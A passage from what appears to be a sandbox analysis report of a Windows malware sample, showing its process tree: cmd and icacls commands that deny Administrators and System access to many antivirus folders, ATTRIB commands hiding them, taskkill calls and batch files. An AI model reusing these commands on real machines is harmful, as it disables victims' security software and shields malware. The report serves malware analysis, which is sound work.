      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
      4⤵
      PID:4604
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Администраторы:(F)
        5⤵
        
        PID:5596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:4532
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        
        PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
      4⤵
      PID:5276
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny Администраторы:(F)
        5⤵
        
        PID:5688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny System:(F)
        5⤵
        
        PID:5516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
      4⤵
      PID:5964
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:4524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
      4⤵
      PID:2796
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny System:(F)
        5⤵
        
        PID:5828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
      4⤵
      PID:2076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
      4⤵
      PID:5560
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5972
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:5548
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5148
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      PID:4736
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5268
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5580
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6040
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:4400
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4584
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4932
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5464
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1220
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5600
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5408
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5288
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6084
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1892
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2164
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4384
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5632
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6136
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5248
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:4632
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5440
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5948
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5292
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5520
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5896
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4148
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:3140
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5232
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5524
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5152
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5592
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5936
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5284
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4700
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:812
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:1784
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6132
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4880
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5316
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:4856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:4280
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:5796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:5940
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:4724
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:5272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
      4⤵
      PID:5720
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM iediagcmd.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:4904
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5332
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5348
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5260
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:1268
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\360\Total Security"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5880
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:2552
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\360TotalSecurity
        5⤵
        Views/modifies file attributes
        
        PID:2500
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\360safe
        5⤵
        Views/modifies file attributes
        
        PID:5428
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5816
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\Avira
        5⤵
        Views/modifies file attributes
        
        PID:6068
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4564
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Package Cache"
        5⤵
        Views/modifies file attributes
        
        PID:5744
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5192
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\ESET"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5108
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5692
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\ESET
        5⤵
        Views/modifies file attributes
        
        PID:5588
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5860
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5652
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5352
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\AVAST Software"
        5⤵
        Views/modifies file attributes
        
        PID:6044
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5784
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
        5⤵
        Views/modifies file attributes
        
        PID:5892
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
        5⤵
        Views/modifies file attributes
        
        PID:4712
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5584
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5336
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\AdwCleaner"
        5⤵
        Views/modifies file attributes
        
        PID:5188
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:6072
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5916
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5760
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "c:\programdata\Malwarebytes"
        5⤵
        Views/modifies file attributes
        
        PID:5432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5132
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\MB3Install"
        5⤵
        Views/modifies file attributes
        
        PID:2896
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:2596
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\KVRT_Data"
        5⤵
        Views/modifies file attributes
        
        PID:5696
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5416
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Norton"
        5⤵
        Views/modifies file attributes
        
        PID:1640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5712
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Avg"
        5⤵
        Views/modifies file attributes
        
        PID:1132
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:4588
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\grizzly"
        5⤵
        Views/modifies file attributes
        
        PID:6032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4320
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Doctor Web"
        5⤵
        Views/modifies file attributes
        
        PID:6008
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2032
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Indus"
        5⤵
        Views/modifies file attributes
        
        PID:5472
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5452
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\WINDOWS\McMwt"
        5⤵
        Drops file in Windows directory
        Views/modifies file attributes
        
        PID:5792
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:748
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5748
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5780
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2416
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2900
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1040
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5840
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5768
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5732
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
        5⤵
        Views/modifies file attributes
        
        PID:1796
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
        5⤵
        Views/modifies file attributes
        
        PID:4560
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
        5⤵
        Views/modifies file attributes
        
